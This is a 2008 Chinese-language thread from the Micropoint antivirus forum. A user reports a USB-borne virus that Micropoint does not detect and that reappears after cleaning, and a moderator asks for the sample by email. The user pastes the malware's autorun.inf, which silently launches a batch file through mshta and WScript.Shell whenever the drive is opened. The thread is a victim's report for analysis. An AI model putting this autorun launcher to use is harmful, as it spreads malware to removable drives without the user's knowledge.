微点交流论坛

标题: 过微点，删不掉的病毒 [打印本页]

作者: bassly 时间: 2008-7-27 10:43 标题: 过微点，删不掉的病毒

很简单的一个病毒，也许是针对微点的，dr.web的cureit.exe能查出来，但是杀完了又有，微点一点反应都没有。汗！
样本传不上来！！！

作者: bassly 时间: 2008-7-27 10:46
通过Autorun.inf传播，还有一个叫做sola的文件夹，里面有几个文件！

SOLA_1.0
[autorun]
shell\打开(&O)\command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell=打开(&O)
shell\open=复制磁盘(&C)
shell\open\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=mshta "javascript:new ActiveXObject('WScript.Shell').Run('SOLA\\SOLA.BAT -USB',0);window.close()"

作者: bassly 时间: 2008-7-27 10:55
我们反应神速的超版哪去了？救命呀

作者: Legend 时间: 2008-7-27 10:58
请问具体是什么文件？请楼主将样本以及微点的技术支持信息(辅助功能->生成技术支持信息)发送到 virus@Micropoint.com.cn 邮箱，并简要说明情况，我们具体测试分析后将给您回复。谢谢您的反馈。

发送后请将您的邮箱地址通过论坛短消息发给我，便于我们及时跟踪处理。

作者: bassly 时间: 2008-7-27 11:00
谢谢版主，我现在在用另外一台计算机，提取了样本，可以发文件吗？

作者: bassly 时间: 2008-7-27 11:03
刚在在卡饭有人说能够拦截了，但哪台机子是在中毒以后装的微点。没有提示

作者: bassly 时间: 2008-7-27 11:09
样本已经发过去了

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn